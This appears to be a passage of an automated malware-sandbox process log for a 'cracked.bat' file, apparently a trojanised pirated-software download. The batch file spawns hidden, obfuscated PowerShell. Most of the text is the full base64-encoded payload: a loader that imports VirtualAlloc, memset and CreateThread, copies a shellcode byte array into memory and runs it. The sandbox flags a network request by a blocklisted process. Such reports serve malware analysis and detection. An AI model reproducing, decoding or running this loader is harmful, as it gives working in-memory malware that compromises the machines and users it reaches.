gAMQBlACwAMAB4ADYAMQAsADAAeAA3ADIALAAwAHgAOQBiACwAMAB4ADAAOAAsADAAeABmADIALAAwAHgAMAAxACwAMAB4AGEAOQAsADAAeAA5ADcALAAwAHgAYQA4ACwAMAB4ADgAZAAsADAAeAA4ADEALAAwAHgANQAwACwAMAB4ADcANgAsADAAeAA0ADkALAAwAHgAOQAzACwAMAB4ADcANwAsADAAeAA4ADkALAAwAHgAOAA1ACwAMAB4ADEAYgAsADAAeAAxADcALAAwAHgANwA0ACwAMAB4ADIANgAsADAAeAA1AGMALAAwAHgAMwAxACwAMAB4AGIAMgAsADAAeAA3ADIALAAwAHgAMABjACwAMAB4ADIAOQAsADAAeAAxADMALAAwAHgAZgBiACwAMAB4AGMANwAsADAAeABhADkALAAwAHgAOQBjACwAMAB4ADIAZQAsADAAeAA3AGQALAAwAHgAYQAwACwAMAB4ADAAYQAsADAAeAA0ADIALAAwAHgAMwBiACwAMAB4ADYAOQAsADAAeABkADkALAAwAHgAMABjACwAMAB4ADMAZQAsADAAeAA5ADIALAAwAHgANgA2ACwAMAB4ADIAYgAsADAAeABiADcALAAwAHgANwA0ACwAMAB4AGMAOAAsADAAeABlADQALAAwAHgAOQA4ACwAMAB4ADIAOAAsADAAeABhADgALAAwAHgANQA0ACwAMAB4ADUAOQAsADAAeAA5ADkALAAwAHgANAAwACwAMAB4AGIAZgAsADAAeAA1ADYALAAwAHgAYwA2ACwAMAB4ADcAMAAsADAAeABjADAALAAwAHgAYgBjACwAMAB4ADYAZgAsADAAeAAxAGEALAAwAHgAMgBmACwAMAB4ADYAOQAsADAAeABjADcALAAwAHgAYgAyACwAMAB4AGQANgAsADAAeAAzADAALAAwAHgAOQAzACwAMAB4ADIAMwAsADAAeAAxADYALAAwAHgAZQBmACwAMAB4AGQAOQAsADAAeAA2ADMALAAwAHgAOQBjACwAMAB4ADEAYwAsADAAeAAxAGQALAAwAHgAMgBkACwAMAB4ADUANQAsADAAeAA2ADgALAAwAHgAMABkACwAMAB4AGQAOQAsADAAeAA5ADUALAAwAHgAMgA3ACwAMAB4ADYAZgAsADAAeAA0AGYALAAwAHgAYQA5ACwAMAB4ADkAZAAsADAAeAAxAGEALAAwAHgANgBmACwAMAB4ADMAZgAsADAAeAAxAGEALAAwAHgAOABkACwAMAB4ADMAOAAsADAAeABkADcALAAwAHgAMgAwACwAMAB4AGUAOAAsADAAeAAwAGUALAAwAHgANwA4ACwAMAB4AGQAYQAsADAAeABkAGYALAAwAHgAMAA1ACwAMAB4AGIAMQAsADAAeAA0AGUALAAwAHgAYQAwACwAMAB4ADcAMQAsADAAeABiAGUALAAwAHgAOQBlACwAMAB4ADIAMAAsADAAeAA4ADEALAAwAHgAZQA4ACwAMAB4AGYANAAsADAAeAAyADAALAAwAHgAZQA5ACwAMAB4ADQAYwAsADAAeABhAGQALAAwAHgANwAyACwAMAB4ADAAYwAsADAAeAA5ADMALAAwAHgANwA4ACwAMAB4AGUANwAsADAAeAA5AGQALAAwAHgAMAA2ACwAMAB4ADgAMwAsADAAeAA1AGUALAAwAHgANwAyACwAMAB4ADgAMAAsADAAeABlAGIALAAwAHgANQBjACwAMAB4AGEAZAAsADAAeABlADYALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA5ADgALAAwAHgAZgA2ACwAMAB4ADgAOAAsADAAeAA0ADkALAAwAHgAZQA0ACwAMAB4ADgAYwAsADAAeABlADAALAAwAHgANAA5ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABTAGUAbwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAUwBlAG8ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFMAZQBvACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAWgBqAE8ASQApACkAOwAkAFYAVQBiAG0AIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAcQBiAFgAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAcQBiAFgAIAAkAFYAVQBiAG0AIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAVgBVAGIAbQAgACQAZQAiADsAfQA=
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4356

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABvAHoAVAAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG8AegBUACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZgAsADAAeABlAGYALAAwAHgAOAAzACwAMAB4ADYAMwAsADAAeAA3ADQALAAwAHgAZABkACwAMAB4AGMAMgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwA4ACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgAOQA3ACwAMAB4ADgAZAAsADAAeAA4ADEALAAwAHgAOAAxACwAMAB4ADkAYgAsADAAeAA3AGEALAAwAHgAYwBhACwAMAB4ADYAYQAsADAAeAA2ADMALAAwAHgANwBiACwAMAB4AGIANQAsADAAeABlADMALAAwAHgAOAA2ACwAMAB4ADQAYQAsADAAeABlADcALAAwAHgAOQAwACwAMAB4AGMAMwAsADAAeABmAGYALAAwAHgAMwA3ACwAMAB4AGQAMgAsADAAeAA4ADEALAAwAHgAZgAzACwAMAB4AGIAYwAsADAAeABiADYALAAwAHgAMwAxACwAMAB4ADMAZAAsADAAeAAzAGMALAAwAHgAMwA5ACwAMAB4ADgAZQAsADAAeAA3ADcALAAwAHgAZQA0ACwAMAB4AGMAZAAsADAAeAA4ADIALAAwAHgAYQBmACwAMAB4AGQAOQAsADAAeAAxADEALAAwAHgAYwBlACwAMAB4ADgAYwAsADAAeAA3ADgALAAwAHgAZQBlACwAMAB4ADAAYwAsADAAeABjADEALAAwAHgANQBhACwAMAB4AGMAZgAsADAAeABkAGYALAAwAHgAMQA0ACwAMAB4ADkAYQAsADAAeAAwADgALAAwAHgAOQA2ACwAMAB4ADUAMwAsADAAeAA3ADMALAAwAHgAYwA0ACwAMAB4ADcAZgAsADAAeAAxADcALAAwAHgAZAA5ACwAMAB4AGYAOQAsADAAeABmADQALAAwAHgANgA1ACwAMAB4AGUAMgAsADAAeABmADgALAAwAHgAZABhACwAMAB4AGUAMQAsADAAeAA1AGEALAAwAHgAOAAzACwAMAB4ADUAZgAsADAAeAAzADUALAAwAHgAMgBlACwAMAB4ADMAZgAsADAAeAA1AGUALAAwAHgANgA2ACwAMAB4ADQANAAsADAAeABlADcALAAwAHgANAAwACwAMAB4ADAAZAAsADAAeAAxADMALAAwAHgAMAAwACwAMAB4AGQAMAAsADAAeAAxADAALAAwAHgANwA3ACwAMAB4AGIANQAsADAAeAAxADkALAAwAHgANgA2ACwAMAB4ADQAYgAsADAAeABmAGYALAAwAHgAMQAyACwAMAB4AGIAMwAsADAAeAAzADgALAAwAHgAZgBlACwAMAB4AGYAMgAsADAAeAA4AGQALAAwAHgAYwAxACwAMAB4ADMAMAAsADAAeAAzAGEALAAwAHgAMgBjACwAMAB4AGYAMgAsADAAeAAzAGUALAAwAHgAMQA2ACwAMAB4AGEAZQAsADAAeABjAGEALAAwAHgANwA5ACwAMAB4ADgANgAsADAAeABjADQALAAwAHgAMgAwACwAMAB4ADcAYQAsADAAeAAzAGIALAAwAHgAZABmACwAMAB4AGYAMgAsADAAeAAwADAALAAwAHgAZQA3ACwAMAB4ADYAYQAsADAAeABlADUALAAwAHgAYQAzACwAMAB4ADYAYwAsADAAeABjAGMALAAwAHgAYwAxACwAMAB4ADUAMgAsADAAeABhADEALAAwAHgAOABiACwAMAB4ADgAMgAsADAAeAA1ADkALAAwAHgAMABlACwAMAB4AGQAZgAsADAAeABjAGQALAAwAHgANwBkACwAMAB4ADkAMQAsADAAeAAwAGMALAAwAHgANgA2ACwAMAB4ADcAOQAsADAAeAAxAGEALAAwAHgAYgAzACwAMAB4AGEAOQAsADAAeAAwAGIALAAwAHgANQA4ACwAMAB4ADkAMAAsADAAeAA2AGQALAAwAHgANQA3ACwAMAB4ADMAYgAsADAAeABiADkALAAwAHgAMwA0ACwAMAB4ADMAZAAsADAAeABlAGEALAAwAHgAYwA2ACwAMAB4ADIANwAsADAAeAA5ADkALAAwAHgANQAzACwAMAB4ADYAMwAsADAAeAAyADMALAAwAHgAMAA4ACwAMAB4ADgAMgAsADAAeAAxADMALAAwAHgAYwBjACwAMAB4AGQAMgAsADAAeABhAGIALAAwAHgANAA5ACwAMAB4ADUAYgAsADAAeAAxAGUALAAwAHgANgAxACwAMAB4ADcAMgAsADAAeAA5AGIALAAwAHgAMAA4ACwAMAB4AGYAMgAsADAAeAAwADEALAAwAHgAYQA5ACwAMAB4ADkANwAsADAAeABhADgALAAwAHgAOABkACwAMAB4ADgAMQAsADAAeAA1ADAALAAwAHgANwA2ACwAMAB4ADQAOQAsADAAeAA5ADMALAAwAHgANwA3ACwAMAB4ADgAOQAsADAAeAA4ADUALAAwAHgAMQBiACwAMAB4ADEANwAsADAAeAA3ADQALAAwAHgAMgA2ACwAMAB4ADUAYwAsADAAeAAzADEALAAwAHgAYgAyACwAMAB4ADcAMgAsADAAeAAwAGMALAAwAHgAMgA5ACwAMAB4ADEAMwAsADAAeABmAGIALAAwAHgAYwA3ACwAMAB4AGEAOQAsADAAeAA5AGMALAAwAHgAMgBlACwAMAB4ADcAZAAsADAAeABhADAALAAwAHgAMABhACwAMAB4ADQAMgAsADAAeAAzAGIALAAwAHgANgA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAMwBlACwAMAB4ADkAMgAsADAAeAA2ADYALAAwAHgAMgBiACwAMAB4AGIANwAsADAAeAA3ADQALAAwAHgAYwA4ACwAMAB4AGUANAAsADAAeAA5ADgALAAwAHgAMgA4ACwAMAB4AGEAOAAsADAAeAA1ADQALAAwAHgANQA5ACwAMAB4ADkAOQAsADAAeAA0ADAALAAwAHgAYgBmACwAMAB4ADUANgAsADAAeABjADYALAAwAHgANwAwACwAMAB4AGMAMAAsADAAeABiAGMALAAwAHgANgBmACwAMAB4ADEAYQAsADAAeAAyAGYALAAwAHgANgA5ACwAMAB4AGMANwAsADAAeABiADIALAAwAHgAZAA2ACwAMAB4ADMAMAAsADAAeAA5ADMALAAwAHgAMgAzACwAMAB4ADEANgAsADAAeABlAGYALAAwAHgAZAA5ACwAMAB4ADYAMwAsADAAeAA5AGMALAAwAHgAMQBjACwAMAB4ADEAZAAsADAAeAAyAGQALAAwAHgANQA1ACwAMAB4ADYAOAAsADAAeAAwAGQALAAwAHgAZAA5ACwAMAB4ADkANQAsADAAeAAyADcALAAwAHgANgBmACwAMAB4ADQAZgAsADAAeABhADkALAAwAHgAOQBkACwAMAB4ADEAYQAsADAAeAA2AGYALAAwAHgAMwBmACwAMAB4ADEAYQAsADAAeAA4AGQALAAwAHgAMwA4ACwAMAB4AGQANwAsADAAeAAyADAALAAwAHgAZQA4ACwAMAB4ADAAZQAsADAAeAA3ADgALAAwAHgAZABhACwAMAB4AGQAZgAsADAAeAAwADUALAAwAHgAYgAxACwAMAB4ADQAZQAsADAAeABhADAALAAwAHgANwAxACwAMAB4AGIAZQAsADAAeAA5AGUALAAwAHgAMgAwACwAMAB4ADgAMQAsADAAeABlADgALAAwAHgAZgA0ACwAMAB4ADIAMAAsADAAeABlADkALAAwAHgANABjACwAMAB4AGEAZAAsADAAeAA3ADIALAAwAHgAMABjACwAMAB4ADkAMwAsADAAeAA3ADgALAAwAHgAZQA3ACwAMAB4ADkAZAAsADAAeAAwADYALAAwAHgAOAAzACwAMAB4ADUAZQAsADAAeAA3ADIALAAwAHgAOAAwACwAMAB4AGUAYgAsADAAeAA1AGMALAAwAHgAYQBkACwAMAB4AGUANgAsADAAeABiADMALAAwAHgAOQBmACwAMAB4ADkAOAAsADAAeABmADYALAAwAHgAOAA4ACwAMAB4ADQAOQAsADAAeABlADQALAAwAHgAOABjACwAMAB4AGUAMAAsADAAeAA0ADkAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFMAZQBvAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABTAGUAbwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAUwBlAG8ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:5076

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\phe22u1d\phe22u1d.cmdline"
5⤵
PID:4516

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES630A.tmp" "c:\Users\Admin\AppData\Local\Temp\phe22u1d\CSCBEA742C2D9DD40CBA5F8B951AF97A.TMP"
6⤵
PID:5488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\cracked.bat" "
1⤵
PID:5072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 -C "sv N -;sv xBk ec;sv S ((gv N).value.toString()+(gv xBk).value.toString());powershell (gv S).value.toString() 'JABaAGoATwBJACAAPQAgACcAJABvAHoAVAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABvAHoAVAAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGYALAAwAHgAZQBmACwAMAB4ADgAMwAsADAAeAA2ADMALAAwAHgANwA0ACwAMAB4AGQAZAAsADAAeABjADIALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAOAAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADkANwAsADAAeAA4AGQALAAwAHgAOAAxACwAMAB4ADgAMQAsADAAeAA5AGIALAAwAHgANwBhACwAMAB4AGMAYQAsADAAeAA2AGEALAAwAHgANgAzACwAMAB4ADcAYgAsADAAeABiADUALAAwAHgAZQAzACwAMAB4ADgANgAsADAAeAA0AGEALAAwAHgAZQA3ACwAMAB4ADkAMAAsADAAeABjADMALAAwAHgAZgBmACwAMAB4ADMANwAsADAAeABkADIALAAwAHgAOAAxACwAMAB4AGYAMwAsADAAeABiAGMALAAwAHgAYgA2ACwAMAB4ADMAMQAsADAAeAAzAGQALAAwAHgAMwBjACwAMAB4ADMAOQAsADAAeAA4AGUALAAwAHgANwA3ACwAMAB4AGUANAAsADAAeABjAGQALAAwAHgAOAAyACwAMAB4AGEAZgAsADAAeABkADkALAAwAHgAMQAxACwAMAB4AGMAZQAsADAAeAA4AGMALAAwAHgANwA4ACwAMAB4AGUAZQAsADAAeAAwAGMALAAwAHgAYwAxACwAMAB4ADUAYQAsADAAeABjAGYALAAwAHgAZABmACwAMAB4ADEANAAsADAAeAA5AGEALAAwAHgAMAA4ACwAMAB4ADkANgAsADAAeAA1ADMALAAwAHgANwAzACwAMAB4AGMANAAsADAAeAA3AGYALAAwAHgAMQA3ACwAMAB4AGQAOQAsADAAeABmADkALAAwAHgAZgA0ACwAMAB4ADYANQAsADAAeABlADIALAAwAHgAZgA4ACwAMAB4AGQAYQAsADAAeABlADEALAAwAHgANQBhACwAMAB4ADgAMwAsADAAeAA1AGYALAAwAHgAMwA1ACwAMAB4ADIAZQAsADAAeAAzAGYALAAwAHgANQBlACwAMAB4ADYANgAsADAAeAA0ADQALAAwAHgAZQA3ACwAMAB4ADQAMAAsADAAeAAwAGQALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABkADAALAAwAHgAMQAwACwAMAB4ADcANwAsADAAeABiADUALAAwAHgAMQA5ACwAMAB4ADYANgAsADAAeAA0AGIALAAwAHgAZgBmACwAMAB4ADEAMgAsADAAeABiADMALAAwAHgAMwA4ACwAMAB4AGYAZQAsADAAeABmADIALAAwAHgAOABkACwAMAB4AGMAMQAsADAAeAAzADAALAAwAHgAMwBhACwAMAB4ADIAYwAsADAAeABmADIALAAwAHgAMwBlACwAMAB4ADEANgAsADAAeABhAGUALAAwAHgAYwBhACwAMAB4ADcAOQAsADAAeAA4ADYALAAwAHgAYwA0ACwAMAB4ADIAMAAsADAAeAA3AGEALAAwAHgAMwBiACwAMAB4AGQAZgAsADAAeABmADIALAAwAHgAMAAwACwAMAB4AGUANwAsADAAeAA2AGEALAAwAHgAZQA1ACwAMAB4AGEAMwAsADAAeAA2AGMALAAwAHgAYwBjACwAMAB4AGMAMQAsADAAeAA1ADIALAAwAHgAYQAxACwAMAB4ADgAYgAsADAAeAA4ADIALAAwAHgANQA5ACwAMAB4ADAAZQAsADAAeABkAGYALAAwAHgAYwBkACwAMAB4ADcAZAAsADAAeAA5ADEALAAwAHgAMABjACwAMAB4ADYANgAsADAAeAA3ADkALAAwAHgAMQBhACwAMAB4AGIAMwAsADAAeABhADkALAAwAHgAMABiACwAMAB4ADUAOAAsADAAeAA5ADAALAAwAHgANgBkACwAMAB4ADUANwAsADAAeAAzAGIALAAwAHgAYgA5ACwAMAB4ADMANAAsADAAeAAzAGQALAAwAHgAZQBhACwAMAB4AGMANgAsADAAeAAyADcALAAwAHgAOQA5ACwAMAB4ADUAMwAsADAAeAA2ADMALAAwAHgAMgAzACwAMAB4ADAAOAAsADAAeAA4ADIALAAwAHgAMQAzACwAMAB4AGMAYwAsADAAeABkADIALAAwAHgAYQBiACwAMAB4ADQAOQAsADAAeAA1AGIALAAwAHgAMQBlACwAMAB4ADYAMQAsADAAeAA3ADIALAAwAHgAOQBiACwAMAB4ADAAOAAsADAAeABmADIALAAwAHgAMAAxACwAMAB4AGEAOQAsADAAeAA5ADcALAAwAHgAYQA4ACwAMAB4ADgAZAAsADAAeAA4ADEALAAwAHgANQAwACwAMAB4ADcANgAsADAAeAA0ADkALAAwAHgAOQAzACwAMAB4ADcANwAsADAAeAA4ADkALAAwAHgAOAA1ACwAMAB4ADEAYgAsADAAeAAxADcALAAwAHgANwA0ACwAMAB4ADIANgAsADAAeAA1AGMALAAwAHgAMwAxACwAMAB4AGIAMgAsADAAeAA3ADIALAAwAHgAMABjACwAMAB4ADIAOQAsADAAeAAxADMALAAwAHgAZgBiACwAMAB4AGMANwAsADAAeABhADkALAAwAHgAOQBjACwAMAB4ADIAZQAsADAAeAA3AGQALAAwAHgAYQAwACwAMAB4ADAAYQAsADAAeAA0ADIALAAwAHgAMwBiACwAMAB4ADYAOQAsADAAeABkADkALAAwAHgAMABjACwAMAB4ADMAZQAsADAAeAA5ADIALAAwAHgANgA2ACwAMAB4ADIAYgAsADAAeABiADcALAAwAHgANwA0ACwAMAB4AGMAOAAsADAAeABlADQALAAwAHgAOQA4ACwAMAB4ADIAOAAsADAAeABhADgALAAwAHgANQA0ACwAMAB4ADUAOQAsADAAeAA5ADkALAAwAHgANAAwACwAMAB4AGIAZgAsADAAeAA1ADYALAAwAHgAYwA2ACwAMAB4ADcAMAAsADAAeABjADAALAAwAHgAYgBjACwAMAB4ADYAZgAsADAAeAAxAGEALAAwAHgAMgBmACwAMAB4ADYAOQAsADAAeABjADcALAAwAHgAYgAyACwAMAB4AGQANgAsADAAeAAzADAALAAwAHgAOQAzACwAMAB4ADIAMwAsADAAeAAxADYALAAwAHgAZQBmACwAMAB4AGQAOQAsADAAeAA2ADMALAAwAHgAOQBjACwAMAB4ADEAYwAsADAAeAAxAGQALAAwAHgAMgBkACwAMAB4ADUANQAsADAAeAA2ADgALAAwAHgAMABkACwAMAB4AGQAOQAsADAAeAA5ADUALAAwAHgAMgA3ACwAMAB4ADYAZgAsADAAeAA0AGYALAAwAHgAYQA5ACwAMAB4ADkAZAAsADAAeAAxAGEALAAwAHgANgBmACwAMAB4ADMAZgAsADAAeAAxAGEALAAwAHgAOABkACwAMAB4ADMAOAAsADAAeABkADcALAAwAHgAMgAwACwAMAB4AGUAOAAsADAAeAAwAGUALAAwAHgANwA4ACwAMAB4AGQAYQAsADAAeABkAGYALAAwAHgAMAA1ACwAMAB4AGIAMQAsADAAeAA0AGUALAAwAHgAYQAwACwAMAB4ADcAMQAsADAAeABiAGUALAAwAHgAOQBlACwAMAB4ADIAMAAsADAAeAA4ADEALAAwAHgAZQA4ACwAMAB4AGYANAAsADAAeAAyADAALAAwAHgAZQA5ACwAMAB4ADQAYwAsADAAeABhAGQALAAwAHgANwAyACwAMAB4ADAAYwAsADAAeAA5ADMALAAwAHgANwA4ACwAMAB4AGUANwAsADAAeAA5AGQALAAwAHgAMAA2ACwAMAB4ADgAMwAsADAAeAA1AGUALAAwAHgANwAyACwAMAB4ADgAMAAsADAAeABlAGIALAAwAHgANQBjACwAMAB4AGEAZAAsADAAeABlADYALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA5ADgALAAwAHgAZgA2ACwAMAB4ADgAOAAsADAAeAA0ADkALAAwAHgAZQA0ACwAMAB4ADgAYwAsADAAeABlADAALAAwAHgANAA5ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABTAGUAbwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcA